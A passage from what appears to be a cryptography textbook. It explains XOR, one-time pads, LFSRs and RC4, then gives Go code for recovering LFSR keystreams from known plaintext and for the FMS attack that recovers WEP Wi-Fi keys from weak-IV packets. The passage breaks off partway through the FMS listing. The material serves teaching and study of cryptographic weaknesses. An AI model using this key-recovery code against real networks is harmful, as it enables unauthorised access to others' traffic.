In chapter 1 we also briefly touched upon Kerckhoffs's principle, which states that a cryptosystem should be secure even if an attacker knows everything about the system except the key. This was phrased by Claude Shannon (commonly known as the "father of information theory") as "the enemy knows the system". Shannon went on to describe precisely what it would mean for an encryption algorithm to provide perfect security: the ciphertext should provide no information about the plaintext without knowledge of the secret key. "Shannon ciphers" are symmetric encryption algorithms that satisfy this criterion.
Perfect security
An encrypted message must provide no information about the original plaintext unless
you have the secret key.
x   y   z = x ⊕ y
T   T   F
T   F   T
F   T   T
F   F   F
Table 4.1 Truth table (inputs and output) for the XOR operation
“Exclusive” refers to the fact that the result is true only if one of the inputs is exclusively
true (i.e., the other one is false). We apply the exclusivity principle in daily life all the time.
For example, dual nationality is expressly forbidden for people born in certain countries.
They can be a citizen of their birth country or immigrate and get naturalized in a new
one, but they cannot legally retain citizenship of both countries (true ⊕ true is false). For a
given world cup, a country can either win or lose the tournament but not both. Biological
organisms are either dead or alive (most of the time) and so on.
As it turns out, this almost wickedly simple operation protects the world’s information
by serving as a fundamental building block of cryptography. Let’s see how.
Imagine that x is the plaintext in figure 4.1, y is the key, and the result of the XOR operation is the ciphertext, as shown in figure 4.2. This gives us the truth table shown in table 4.2.
If you receive ciphertext z and know the key y, you can simply XOR them to get back x. In other words, we start from the right-most column (ciphertext) in table 4.2 and XOR it with the middle column (key) to get back the left-most column (plaintext). For example, if you receive the ciphertext 0 and the key is 1 (the bottom row), the exclusive-or gives the plaintext 1. Reading each row both ways, encryption goes left to right while decryption goes right to left. It might be helpful to do this exercise for all four rows to grok the idea. In a nutshell, when XOR is used as the encryption algorithm, encrypting and then decrypting a piece of data under the same key produces the original data.
Figure 4.2 Usage of XOR as a symmetric encryption algorithm
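A tiny standalone Go snippet (not one of the book's listings) makes the round trip concrete; the byte values are arbitrary examples.

package main

import "fmt"

func main() {
	var plaintext, key byte = 0x41, 0x5A // arbitrary example bytes

	ciphertext := plaintext ^ key // encrypt: plaintext XOR key
	recovered := ciphertext ^ key // decrypt: ciphertext XOR key

	fmt.Printf("plaintext=%#02x ciphertext=%#02x recovered=%#02x\n",
		plaintext, ciphertext, recovered)
}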
If an attacker gets hold of the ciphertext and does not know the key, can they “guess” the
plaintext? Let’s say the ciphertext is a 1 (the two middle rows in table 4.1). Since the key is
unknown, both plaintexts (0 or 1) are equally possible. In other words, ciphertext provides
no information about the plaintext, making it perfectly secure.
XOR therefore satisfies two important criteria as an encryption algorithm:
When using the same key, decryption produces the original plaintext for a corre-
sponding ciphertext.
For a given ciphertext, if the key is unknown to the attacker, all plaintexts are equally
probable as the original message.
Imagine that you use this algorithm with your own secret key to communicate with your close friends. An attacker eavesdrops on your communications and gets hold of a bunch of ciphertexts. They don't know the key, but they guess that some of the plaintexts probably start with "Hello" or some variation of a common greeting. From there they can recover the first few bytes of the key by rearranging the terms of equation 4.1. This is actually quite a powerful technique, a variant of which was used to break the WEP protocol (the first attempt by engineers to provide Wi-Fi security); we will discuss it in detail in the upcoming sections and implement the exploit ourselves. For now, let's familiarize ourselves with the rearranged equation 4.2 to see how parts of the key can be recovered by XORing the ciphertext and plaintext.
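A small standalone sketch (not one of the book's listings) shows the idea of equation 4.2 in action; the key and message here are illustrative and of equal length.

package main

import "fmt"

func main() {
	key := []byte("topsecretkey!")
	plaintext := []byte("Hello, Alice!")

	// Encrypt by XORing plaintext with the key (equation 4.1).
	ciphertext := make([]byte, len(plaintext))
	for i := range plaintext {
		ciphertext[i] = plaintext[i] ^ key[i]
	}

	// The attacker guesses that the message starts with "Hello" and recovers
	// the first few key bytes by XORing the guess with the ciphertext (equation 4.2).
	guess := []byte("Hello")
	for i := range guess {
		fmt.Printf("recovered key byte %d: %c\n", i, ciphertext[i]^guess[i])
	}
}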
So, we have a few major challenges in using OTP or XOR as one encryption algorithm
to rule them all:
The key must be at least as long as the plaintext.
The key must be truly random.
The key must not be reused.
Imagine a TRNG generates as many bytes as needed for a plaintext. These bytes are shared as the key with the intended recipient of our communication. Now we can send one plaintext of that length and, assuming the attacker does not get hold of the key, we attain perfect security.
Now imagine that the plaintext is actually a video or some high-resolution photo or an
entire dossier. You would need to generate new keys sometimes gigabytes long, somehow
transport those securely to the recipient and then send ciphertexts separately.
This all sounds highly impractical, but for specialized use cases it actually isn't. For example, two parties could use some clever interpretation of specific phone directories as "keys" and then use a one-time pad to encrypt small (one-liner) messages. Around a hundred years ago this could actually have provided a significant level of security, assuming the attacker wasn't familiar with what was being used for the key. These days, however, even if the source of the key was not known, the fact that phone directories are poor sources of randomness would allow sophisticated adversaries to crack the key without knowing the specific booklet that was used to generate it.
The problem of needing a key as long as the plaintext can be solved by using a CSPRNG. A CSPRNG takes a "seed" as input and generates a stream of pseudorandom bytes. We can use those bytes as the key to a one-time pad, as shown in figure 4.3. The "seed" of the CSPRNG then becomes a shortened version of the key that can be shared with the recipient. Instead of generating and sharing a random key of 5 gigabytes to share a video file, you can simply share a few hundred bytes of seed and then run the CSPRNG to generate a "keystream".
Figure 4.3 Stream ciphers: CSPRNG providing input key to a one-time pad
Cryptographic nonces
Many cryptographic algorithms require a nonce: short for "number used once". These are random bits that are communicated publicly – and are hence known to attackers – but add unpredictability to the results of such algorithms.
We shall now look at two stream ciphers, implement them, and then exploit them using
their specific weaknesses.
Figure 4.4 Stream ciphers versus block ciphers
A linear feedback shift register works similarly. At each step it moves the internal contents
one bit in some direction, outputs the “ejected” bit as the result of that iteration and then
XORs some of the previous bits to generate a new “shift” bit that it inserts at the other end
to keep things moving. A few iterations of an example LFSR are shown in figure 4.6 – if
you squint hard enough you might be able to see an ouroboros!
Figure 4.6 A “linear feedback” shift register showing execution of first few steps
12 package impl_lfsr
13
14 type LFSR struct {
15 length int
16 taps []byte
17 state []byte
18 }
19
20 func NewLFSR(length int, taps []byte, state []byte) *LFSR {
21 lfsr := &LFSR{
22 length,
23 make([]byte, len(taps)),
24 make([]byte, len(state)),
25 }
26
27 copy(lfsr.state, state)
28 copy(lfsr.taps, taps)
29
30 for i := 0; i < length; i++ {
31 lfsr.GenerateBit()
32 }
33
34 return lfsr
35 }
Figure 4.7 An LFSR providing the keystream for encryption using XOR
The output of an LFSR can be used as the "keystream" for a XOR function to simulate a one-time pad, as shown in figure 4.7. This makes the initial state of the LFSR the "key" for our encryption. The distinction between the key and the keystream is important to understand. The key is, in a manner of speaking, what you use to start the LFSR. The keystream is what actually gets XORed with the plaintext. Let's say the initial key is the Wi-Fi password. If an attacker could somehow compromise a keystream, they could decrypt a packet that was encrypted using that particular keystream. However, they still could not craft new packets that would be decrypted correctly by the router. If they knew the seed – the equivalent of the Wi-Fi password – they would be able to craft correctly encrypted packets of their own. Fortunately, while Wi-Fi uses stream ciphers, it does not use LFSRs. Unfortunately, the first few iterations of Wi-Fi security did use a different stream cipher (RC4) that turned out to be insecure – which we will implement & exploit in the next section.
Before we use our LFSR for encryption, though, let's put some distance between the key and the keystream. Lines 30 - 32 in listing 4.1 show the LFSR "wasting" the first N bits, where N is equal to the length of the LFSR. This simply flushes out the initial key bits, making sure encryption only happens by XORing plaintext with a linear combination of the original key, but never the original key itself.
The workhorse of our LFSR implementation is the GenerateBit() function shown in listing 4.2. It corresponds closely to the operation shown in figure 4.6. We store the old "right-most" bit in outputBit. Lines 40 - 42 calculate the new "shift-in" bit by traversing all bits of the LFSR state and XORing those where a tap is active at the corresponding index. Lines 44 - 46 move the contents of all registers one position to the right, and we finally set the left-most bit of the LFSR state to the newly calculated shift bit.
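Based on this description, GenerateBit() might look like the following sketch, assumed to live in the same impl_lfsr package as the LFSR struct (the book's listing 4.2, with the exact line numbers referenced above, is the authoritative version).

func (lfsr *LFSR) GenerateBit() byte {
	// The "ejected" right-most bit is this iteration's output.
	outputBit := lfsr.state[lfsr.length-1]

	// XOR together every state bit whose tap is active.
	var shiftBit byte
	for i := 0; i < lfsr.length; i++ {
		if lfsr.taps[i] != 0 {
			shiftBit ^= lfsr.state[i]
		}
	}

	// Shift everything one position to the right and insert the new bit on the left.
	for i := lfsr.length - 1; i > 0; i-- {
		lfsr.state[i] = lfsr.state[i-1]
	}
	lfsr.state[0] = shiftBit

	return outputBit
}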
The test cases for this LFSR implementation can be found in the accompanying code
repo at: github.com/krkhan/crypto-impl-exploit
s_3 = a_0 s_0 + a_1 s_1 + a_2 s_2
s_4 = a_0 s_1 + a_1 s_2 + a_2 s_3    (4.5)
s_5 = a_0 s_2 + a_1 s_3 + a_2 s_4

Equation 4.4 can then be represented in the form of a matrix as shown in equation 4.6.

[s_3]   [s_0  s_1  s_2] [a_0]
[s_4] = [s_1  s_2  s_3] [a_1]    (4.6)
[s_5]   [s_2  s_3  s_4] [a_2]
X = SA
S is the “state matrix” and denotes internal contents of the LFSR. A is the “coefficient
matrix” and represents the LFSR taps. X represents L new bits that are obtained by the
linear combination of S and A.
We can find the coefficient matrix A by inverting S, collecting enough bits for filling X
and then solving for A as shown in equation 4.7.
A = S^{-1} X    (4.7)
We will use the matrix Go module from the OpenWhiteBox project (github.com/OpenWhiteBox/primitives/matrix) for matrix inversion. Since we are dealing with "boolean" matrices (they only contain zeros and ones), the module also takes care of the fact that their addition and multiplication are in fact bitwise XOR and bitwise AND respectively.
1 package exploit_lfsr
2
3 import (
4     "errors"
5
6     "github.com/OpenWhiteBox/primitives/matrix"
7     "github.com/krkhan/crypto-impl-exploit/ch04/lfsr/impl_lfsr"
8 )
9
10 const MaxLfsrLength = 256
11
12 func RecoverLFSRWithKnownLengthFromObservedBits(observedBits []byte,
       lfsrLength int) (*impl_lfsr.LFSR, error) {
13     if len(observedBits) < lfsrLength*2 { // Do we have enough bits to fill sMatrix?
14         return nil, errors.New("insufficient observed bits")
15     }
16
17     sMatrix := matrix.GenerateEmpty(lfsrLength, lfsrLength)
18     for i := 0; i < lfsrLength; i++ {
19         for j := 0; j < lfsrLength; j++ {
20             sMatrix[i].SetBit(j, observedBits[i+j] != 0x00) // logically: sMatrix[i][j] = observedBits[i+j]
21         }
22     }
23
24     sInvertMatrix, ok := sMatrix.Invert()
25     if !ok {
26         return nil, errors.New("invert matrix does not exist")
27     }
28
29     xMatrix := matrix.GenerateEmpty(lfsrLength, 1)
30     for i := 0; i < lfsrLength; i++ {
31         xMatrix[i].SetBit(0, observedBits[lfsrLength+i] != 0x00)
32     }
33     tapsMatrix := sInvertMatrix.Compose(xMatrix) // A = S^-1 X
34
35     recoveredTaps := make([]byte, lfsrLength) // convert tapsMatrix to a regular
36     for i := 0; i < lfsrLength; i++ {         // byte slice of size lfsrLength
37         recoveredTaps[lfsrLength-i-1] = tapsMatrix[i].GetBit(0)
38     }
39
40     recoveredState := make([]byte, lfsrLength)
41     for i := 0; i < lfsrLength; i++ {
42         recoveredState[i] = observedBits[len(observedBits)-1-i]
43     }
44
45     return impl_lfsr.NewLFSR(lfsrLength, recoveredTaps, recoveredState), nil
46 }
The function shown on line 12 of listing 4.4 takes a slice of observed bits and the length of the LFSR it is trying to recover. At line 13 we check whether we have enough bits to fill the square matrix S of equation 4.6. Lines 17 - 22 fill sMatrix with the observed bits by calling the SetBit() method on each row of the newly created matrix. Line 24 tries to calculate S^{-1}. This step will fail if the bitstream is not the output of an LFSR (i.e., the bitstream is not a linear combination), or if we have provided the wrong length for the LFSR. We then generate the single-column xMatrix containing lfsrLength rows. We finally implement equation 4.7 on line 33. Lines 35 - 38 convert tapsMatrix back to a regular byte slice. Now that we have recovered the tap positions we can create our own cloned LFSR, but we need to put it in the same state as the one we are trying to exploit. Fortunately, this part is easy: the last lfsrLength observed bits tell us the LFSR state, as read in lines 40 - 43. The last line of the function returns a new LFSR created using the taps and state we just recovered.
REVERSING LFSR TAPS WHEN ITS LENGTH IS NOT KNOWN
In the previous section we recovered the taps of an LFSR by observing its output and constructing matrices related to the LFSR's length L. If we are observing the output of a totally unknown LFSR and have no clue about its length, can we still crack it?
There is a really sophisticated solution to this problem known as the Berlekamp-Massey algorithm. It finds the shortest LFSR (taps and initial state) that would produce any given binary sequence. Although the algorithm is simple to implement and beautiful to see in action, it is hard to understand why it works without a deep mathematical context and explanation – it is, after all, named after two Shannon Award winners (the Nobel Prize of information theory): James Massey & Elwyn Berlekamp. As I struggled with grokking why it works, I thought of a rather ugly workaround: we can just try all lengths one by one. Every wrong length fails on line 24 of listing 4.4 (the matrix inversion) until we hit the correct one. LFSR lengths are usually not that huge – even a 32-bit LFSR can have a period greater than 4 billion. Running our matrix-reversal exploit 32 times takes less than a second on a modern laptop. Therefore, since the brute-force solution is quite practical and much simpler to understand, we'll use it for our exploit instead of the more efficient Berlekamp-Massey algorithm. Listing 4.5 shows us trying different LFSR lengths until we recover one without error.
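A sketch of that brute-force loop, reusing the names and imports from listing 4.4, is shown below (the book's listing 4.5 has the actual code; the function name here is an assumption).

func RecoverLFSRFromObservedBits(observedBits []byte) (*impl_lfsr.LFSR, error) {
	// Try every candidate length; wrong lengths fail at the matrix inversion.
	for length := 1; length <= MaxLfsrLength; length++ {
		lfsr, err := RecoverLFSRWithKnownLengthFromObservedBits(observedBits, length)
		if err == nil {
			return lfsr, nil
		}
	}
	return nil, errors.New("could not recover an LFSR for any candidate length")
}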
To test our exploit we simulate a scenario where an attacker knows a prefix but not the
entire plaintext. That is, the attacker knows that the plaintext message starts with ATTACK
AT but does not know what comes after it. The attacker intercepts a ciphertext and knows
that it was encrypted using an LFSR. Listing 4.6 shows the function that will be used to
simulate this scenario and generate an attack message.
Listing 4.7 generates an encrypted attack message and then recovers the LFSR used
to encrypt it by using the known plaintext. Line 107 corresponds to equation 4.2 for re-
versing the keystream by XORing the known plaintext bytes with corresponding cipher-
text bytes. Lines 108 - 110 “expand” the keystream byte into individual bits to be pro-
cessed by the functions we have defined so far. Line 112 clones the LFSR using observed
keystream bits (so that we can decrypt the remaining ciphertext where we do not know
the corresponding plaintext). Line 117 “decrypts” the ciphertext by encrypting it with the
recovered LFSR. We saw previously that for XOR, encryption and decryption are the
same operation so if we have reversed the LFSR correctly we should get back the original
plaintext. Running the LFSR tests by executing make lfsr generates the output shown in
listing 4.8.
...
=== RUN TestKnownPlaintextAttack
exploit_lfsr_test.go:104: Ciphertext: ”e\xc67gWL.\x7f\xdd08\x8d0J\xaaFQL
:\x90(\xfd\xf6\xcb\x10\x1b/E\xfd\x1f:\xa4\x06\x1a\xae\x83x\x9c2”
exploit_lfsr_test.go:118: Decrypted message: ATTACK AT 2024-01-10
11:25:35 -0800 PST
--- PASS: TestKnownPlaintextAttack (0.00s)
...
Figure 4.8 RC4 internal state: a 256 byte S-box and two pointers i & j
Like other stream ciphers, RC4 generates a keystream as output. Unlike LFSRs, though, RC4 generates the keystream one byte at a time (as opposed to the individual bits generated by each LFSR cycle). These bytes are subsequently used as the keystream for XORing with the plaintext. RC4's internal state consists of two parts, shown in figure 4.8.
An "S-box" (substitution box) containing 256 bytes. The S-box starts out with each location holding its own index (i.e., index 6 contains the byte 0x06 and so on); the algorithm steps then shuffle the entries around. This makes the S-box a permutation: each number from 0-255 appears in the S-box exactly once at all times, but the locations keep changing. Think of filling a box with a bunch of rocks and shaking it violently. The rocks would definitely be displaced, their "ordering" would change, but the box would still contain the same number of rocks, and the same rocks, as before.
Two pointers i and j that keep jumping around the S-box indices based on the algorithm steps.
Our definition of the RC4 internal state is shown in listing 4.9. We also define a swap helper function on line 13 that we will shortly be using in the KSA and PRGA methods.
Listing 4.9 ch04/rc4/impl_rc4/impl_rc4.go
1 package impl_rc4
2
3 import (
4     "math/rand"
5     "time"
6 )
7
8 type RC4 struct {
9 key []byte
10 state [256]byte
11 }
12
13 func swap(x, y *byte) {
14 tmp := *x
15 *x = *y
16 *y = tmp
17 }
18
19 func NewRC4(key []byte) *RC4 {
20 rc4 := &RC4{
21 key: make([]byte, len(key)),
22 }
23 copy(rc4.key, key)
24 return rc4
25 }
RC4 consists of two phases: (1) the key-scheduling algorithm (KSA) and (2) the pseudo-
random generation algorithm (PRGA). When RC4 is initialized with a new key, KSA runs
once and then PRGA generates the bytes to be used as the keystream.
The pseudocode for KSA is shown in listing 4.10 [1]. The S array denotes the S-box and K is the initial key. The first loop initializes the S-box with all values from 0 to 255 (inclusive). The second loop shuffles those bytes around using the i and j pointers. The i pointer scans the S-box all the way from starting index 0 to last index 255 in an incremental fashion. The j pointer, however, keeps jumping all over the place. Each new value of j is obtained by adding the previous value of j, S[i], and K[i] (when i is greater than or equal to the length of the key, the lookup simply wraps around to K[i%len(K)]). At each step, S[i] and S[j] are swapped in the S-box.
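Concretely, a KSA along these lines could be written as a method on the RC4 struct from listing 4.9, reusing its swap helper (the book's listing 4.11 is the actual implementation; the method name here is an assumption).

func (rc4 *RC4) KSA() {
	// Initialize the S-box with the identity permutation.
	for i := 0; i < 256; i++ {
		rc4.state[i] = byte(i)
	}

	// Shuffle the S-box using the key.
	j := 0
	for i := 0; i < 256; i++ {
		j = (j + int(rc4.state[i]) + int(rc4.key[i%len(rc4.key)])) % 256
		swap(&rc4.state[i], &rc4.state[j])
	}
}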
Listing 4.11 implements the pseudocode from listing 4.10 in Go. The first iteration of KSA with a key of "HELLO" is shown in figure 4.9.
Listing 4.11 ch04/rc4/impl_rc4/impl_rc4.go
Figure 4.9 First iteration of KSA for RC4 with a key of "HELLO"; this step happens 255 more times.
The pseudocode for PRGA is shown in listing 4.12 [1]. Every time we need a new byte for the keystream we increment i by one (wrapping around 256 if needed) and then add S[i] to j. We then swap S[i] and S[j] and use S[i]+S[j] as an index into the S-box once more to fetch the final output, the keystream byte KS. Listing 4.14 shows the same pseudocode translated to Go. Figure 4.10 shows PRGA generating a single byte of keystream by showing line 46 in action.
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
KS := S[(S[i] + S[j]) mod 256]
output KS
endwhile
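In the same spirit as the KSA sketch above, a PRGA method producing n keystream bytes could look like the following sketch (the book's listing 4.14 is the actual implementation; the signature here is an assumption).

func (rc4 *RC4) PRGA(n int) []byte {
	keystream := make([]byte, n)
	i, j := 0, 0
	for k := 0; k < n; k++ {
		i = (i + 1) % 256
		j = (j + int(rc4.state[i])) % 256
		swap(&rc4.state[i], &rc4.state[j])
		// S[i]+S[j] indexes the S-box once more to produce the keystream byte.
		keystream[k] = rc4.state[(int(rc4.state[i])+int(rc4.state[j]))%256]
	}
	return keystream
}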
Figure 4.10 One iteration of PRGA producing a keystream byte (after i & j are already swapped)
4.3.2 Exploiting RC4 in WEP using the Fluhrer, Mantin and Shamir (FMS) attack
WEP (Wired Equivalent Privacy) is an algorithm for Wi-Fi security that was ratified as
a standard in the late 90s. If you’ve had the experience of setting a Wi-Fi password on
routers supporting WEP in the early 00s you might remember that they had to be of a
fixed length (among a few choices – 5, 13, 16 or 29 characters long). I remember being fond
of helloworld123 as the Wi-Fi password for a while because it was exactly 13 characters
long while being very easy to communicate & remember.
Figure 4.11 shows the commonly used setup for WEP. An administrator performed the
initial setup on the Wi-Fi device by entering a pre-shared key and then shared that with
the user. The pre-shared key was colloquially known as the “Wi-Fi password” (and every
so often the admin and the user happened to be the same unfortunate soul). Each packet
was encrypted using RC4 with a new key. Each RC4 key would be obtained by concatenat-
ing three random bytes – known as “initialization vector” or IV – with the pre-shared key.
The IV would be sent publicly along with the encrypted packet. The recipient would con-
catenate the packet’s IV again with the PSK to decrypt the packet correctly. If an attacker
snooped the wireless traffic they would know the IV but not the PSK hence they would (in
theory) not know the individual RC4 keys for each packet and the communication would
stay protected. Essentially, the IV is the cryptographic nonce we discussed briefly while
introducing stream ciphers.
Figure 4.11 WEP setup showing pre-shared keys and initialization vectors as input to RC4
As soon as WEP was standardized in the late 90s, concerns were raised about the nonce being too small. The IV consisted of only three bytes, or 24 bits, providing 2^24 possible values. Even if the Wi-Fi drivers (which provided the initialization vector) were using good-quality RNGs, it would take on average about 2^12 (roughly four thousand) packets before two messages ended up using the same IV, allowing an attacker to recover their XORed contents.
In the early 2000s a new attack on RC4 – known as the FMS attack (based on the surnames of its discoverers) – came to light that completely shattered any illusions of security provided by WEP. Even with the discovery of this new attack, not all RC4 implementations were broken. For example, at the time TLS (Transport Layer Security, used to provide website security) remained unscathed because it was using a unique 128-bit key for each message. Compared to WEP – where an attacker needed to capture about four thousand packets before seeing a collision – an attack on TLS needed drastically more (2^64, or some 18 quintillion) messages before a collision would take place on the same web connection. TLS's usage of RC4 was later broken by other weaknesses in the cipher that would be too discursive to discuss in this chapter. We will, however, implement the FMS attack in Go and simulate WEP traffic to test our exploit.
GENERATING WEP PACKETS WITH WEAK IVS
At its core, the FMS attack hinges on the choice of initialization vectors used by Wi-Fi devices. Not all WEP IVs are equally vulnerable to this attack; it only works when someone ends up choosing an IV of the form shown in equation 4.8, where L is the index of the RC4 key byte being targeted and X is an arbitrary byte.

IV = (L, 255, X)    (4.8)
63 var SNAPHeader = [8]byte{0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06}
64
65 type WEPPacketGenerator struct {
66 psk []byte
67 }
68
69 func NewWEPPacketGenerator(psk []byte) *WEPPacketGenerator {
70 generator := &WEPPacketGenerator{
71 psk: make([]byte, len(psk)),
72 }
73 copy(generator.psk, psk)
74 return generator
75 }
76
77 func (wpg *WEPPacketGenerator) GeneratePacketUsingWeakIV(targetIndex int)
([3]byte, []byte) {
78     iv := [3]byte{byte(targetIndex), 255, byte(rand.Intn(256))} // weak IV (equation 4.8)
79 key := make([]byte, len(iv)+len(wpg.psk))
80 copy(key[0:len(iv)], iv[:])
81 copy(key[len(iv):], wpg.psk)
82 rc4 := NewRC4(key)
83 return iv, rc4.Encrypt(SNAPHeader[:])
84 }
To understand the FMS exploit, we will look at the RC4 key and S-box in detail for the first few steps of the key-scheduling algorithm. As the attacker we know the first 3 bytes of the RC4 key (the IV), so the first time we call GeneratePacketUsingWeakIV(targetIndex) we set targetIndex to 3. For a PSK of length N, after the concatenation of the IV and PSK the RC4 key looks like figure 4.12. The S-box at the very beginning of KSA looks like figure 4.13, corresponding to the values of i and j in equation 4.9.
Figure 4.12 RC4 key for GeneratePacketUsingWeakIV(targetIndex=3)
Figure 4.13 KSA S-box and key for RC4 in WEP (S0 , the initial state)
i_0 = 0
j_0 = 0    (4.9)
For your convenience we list the pseudocode for KSA again in listing 4.15. Following the pseudocode, the first update to i and j is shown in equation 4.10.

i_1 = 1
j_1 = j_0 + S_0[i_0] + K[i_0]
    = 0 + 0 + 3    (4.10)
    = 3

At the end of each iteration of the KSA, S[j_new] is swapped with S[i_old]. For example, at the end of the first iteration S[i_0] is swapped with S[j_1], giving us S_1, depicted in figure 4.14. The values at indices 0 & 3 (the shaded boxes) have just been swapped.
Let's execute one more iteration of KSA, giving us equation 4.11 and figure 4.15.

i_2 = 2
j_2 = j_1 + S_1[i_1] + K[i_1]
    = 3 + S_1[1] + K[1]
    = 3 + 1 + 255    (4.11)
    = 259
    ≡ 3 (mod 256)
The first two bytes of the IV (3 and 255) have now played their role in scrambling the S-box. We chose a random value for the third IV byte and called it X. The reason we did not give X an actual value is that it does not really matter for the discussion of this attack. Let's keep it as X and get the new values of our counters in equation 4.12.
Figure 4.15 KSA for RC4 in WEP (S2 )
i_3 = 3
j_3 = j_2 + S_2[i_2] + K[i_2]
    = 3 + S_2[2] + K[2]    (4.12)
    = 3 + 2 + X
    = X'
The reason we don't care about X and X' is that X is already known as the third byte of the IV (i.e., as K[2]) for each packet. We do not need to crack X; it is always sent in public by the Wi-Fi devices. We are interested in the first byte of the PSK, i.e., PSK_1 or K[3], which we will obtain by the end of this procedure. For now, let's swap the values at indices 2 (i.e., i_2) and X' (i.e., j_3) in our S-box, as shown in figure 4.16.
i_4 = 4
j_4 = j_3 + S_3[i_3] + K[i_3]    (4.13)
    = j_3 + S_3[3] + K[3]

Let's take a look at the next update of our counters in equation 4.13, giving us S_4 as shown in figure 4.17. We are getting closer to what we want, i.e., K[3]. We can try rearranging our variables to isolate the holy grail (K[3]) in equation 4.14.
K[3] = j_4 - j_3 - S_3[i_3]
     = j_4 - X' - S_3[3]    (4.14)
Now we face a challenge in continuing our KSA execution with the next byte of the key: as attackers we have now exhausted the three public bytes of the IV, having so far tracked the same S-box as the genuine recipient (S_4 is shown in figure 4.17). We also know X' because it depended only on X, the public third byte of the IV. However, we still do not know j_4. In other words, since the IV is public, as attackers we can only perform the first three iterations of KSA (for certain weak IVs); continuing beyond that would require knowledge of the PSK.
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
KS := S[(S[i] + S[j]) mod 256]
output KS
endwhile
Now imagine that the values at the three locations pointed to by arrows in figure 4.17 (indices 0, 1 and 3) do not change for the rest of the KSA. That is, when we get to the PRGA (shown again in listing 4.16 for convenience), we have (S_0[0], S_0[1], S_0[3]) = (3, 0, j_4(KSA)); i.e., they have remained unchanged from S_4 of KSA all the way up to S_255, which becomes S_0 for PRGA. This is not as far-fetched as it sounds: the i pointer traverses the S-box all the way from left to right, while the j pointer keeps hopping all over the place. Since i has already traversed indices 0, 1, and 3 by S_4, our assumption relies on j not landing on one of these crucial indices again for the rest of the KSA. If this condition holds, the initial S-box for PRGA is shown in figure 4.18. The first update of our counters is shown in equation 4.15.
i_0 = 0; j_0 = 0
i_1 = 1; j_1 = j_0 + S_0[1]
          = 0 + 0    (4.15)
          = 0
After the swap we get S_1, as shown in figure 4.19. The first byte of the keystream (the output of the PRGA) is given by equation 4.16. If our grand assumption holds that the important bytes did not change positions between S_4 and S_255 of KSA (and hence S_0 of PRGA), the first byte of the keystream will be j_4(KSA), exactly what we needed to solve for K[3] in equation 4.14. Equation 4.17 shows the final calculation we will do to resolve K[3]. Remember, we could run KSA only up to j_3 and could not find out j_4. However, because of our assumption that the crucial bytes do not shift for the rest of KSA, we learn j_4 as the first output of the PRGA.

K[3] = KS[0] - X' - S_3[3]    (4.17)
Figure 4.19 PRGA S-box for RC4 in WEP (S1 )
How often would our assumption (that the crucial positions were not touched between S_4(KSA) → S_255(KSA) → S_0(PRGA)) hold? If RC4 in WEP were not vulnerable to the FMS attack, the answer would be 1/256, i.e., any of the bytes of S_4(KSA) should have an equal probability of about 0.4% of being the first output of PRGA. As it turns out, RC4 has statistical biases, and our assumption holds about 3-5% of the time (much more often than 0.4%). The practical implication of this bias is that since we know the first 8 bytes of plaintext, we can always find out KS[0]; and j_4(KSA) will simply be the most frequent value that appears as KS[0]. To recap: without these biases KS[0] would give us no information about the original key, but because of them KS[0] tends to be j_4(KSA) more frequently than chance. This allows the attacker to recover K[3] using equation 4.17. The attack works for any index L other than 3 as well (granted we have recovered the key bytes before that index), as shown in equation 4.18, where j_L and S_L denote the counter and S-box after L iterations of KSA.

K[L] = KS[0] - j_L - S_L[L]    (4.18)
We can now implement our attack in Go and use the WEP packet generator shown earlier (which encrypts the first 8 bytes of WEP packets – the fixed SNAP header – with a user-provided PSK and a weak IV) to test it. Listing 4.17 shows the FMS algorithm recovering the PSK for RC4 in WEP; the attack sequence is described below:
RecoverWEPPSK(wpg, partialKey) is called with a WEP packet generator initialized with a specific PSK. Note that RecoverWEPPSK cannot see the PSK; it can only ask for more packets to be generated using weak IVs. This simulates an attacker sniffing Wi-Fi packets and encountering weak IVs. The amount of traffic we simulate is capped by the WEPMessageVolume constant, set to 50k for our current test.
partialKey denotes the partially recovered PSK; for the first invocation of the method it will be an empty slice, for the second it will contain one byte, and so on.
The first thing we do inside the function body is to identify the index we want to target
with our FMS attack. Since the first three bytes of the RC4 key are known (as the IV),
the targetIndex value would be equal to the length of the PSK we have recovered
so far plus three. At the beginning, we do not know any bytes of the PSK so the
targetIndex is 3. This is shown in line 18. The targetIndex variable corresponds
to L in equation 4.18.
Lines 23 - 24 depict a known-plaintext attack where knowledge of the first byte of the plaintext gives us the first byte of the keystream. For the FMS attack, the first keystream byte is actually all we need (we don't need the next 7 keystream bytes, even though they could be found by XORing the ciphertext with the SNAP header).
Lines 26 - 28 copy the IV and the partial PSK respectively to create the RC4 key.
Lines 30 - 38 depict partial execution of KSA up to iteration L.
Lines 40 - 45 show us finding a candidate for K[L] using equation 4.18. We will get multiple values for K[L], but the correct value will appear 3-5% of the time (instead of only 0.4% of the time, which would have prevented us from selecting one value as the "winner").
The remaining lines of the function simply select the byte value that appeared most often as K[L]. We pretty-print some stats and then end the function by returning the candidate byte that appeared with the highest frequency.
1 package exploit_rc4
2
3 import (
4     "fmt"
5
6     "github.com/krkhan/crypto-impl-exploit/ch04/rc4/impl_rc4"
7 )
8
9 const WEPMessageVolume = 50000
10
11 func swap(x, y *byte) {
12     tmp := *x
13     *x = *y
14     *y = tmp
15 }
16
17 func RecoverWEPPSK(wpg *impl_rc4.WEPPacketGenerator, partialKey []byte) byte {
18     targetIndex := 3 + len(partialKey) // RC4 key = 3 bytes of IV + PSK
19     totalCount := 0
20     freqDict := [256]int{}
21
22     for i := 0; i < WEPMessageVolume; i++ {
23         iv, ciphertext := wpg.GeneratePacketUsingWeakIV(targetIndex)
24         keystreamByte := impl_rc4.SNAPHeader[0] ^ ciphertext[0] // recover the first keystream byte using known plaintext
25
26         key := make([]byte, len(iv)+len(partialKey)) // concatenate IV and (partial) PSK
27         copy(key[0:len(iv)], iv[:])                  // to create the RC4 key
28         copy(key[len(iv):], partialKey)
29
30         state := [256]byte{}
31         for i := 0; i < 256; i++ {
32             state[i] = byte(i)
33         }
34         j := 0
35         for i := 0; i < targetIndex; i++ { // partial execution of KSA for targetIndex iterations
36             j = (j + int(state[i]) + int(key[i])) % 256
37             swap(&state[i], &state[j])
38         }
39
40         candidateKey := (int(keystreamByte) - j - int(state[targetIndex])) % 256
41         if candidateKey < 0 {
42             candidateKey += 256
43         }
44         freqDict[candidateKey] += 1 // calculate K[L] from equation 4.18 and track the count for each candidate
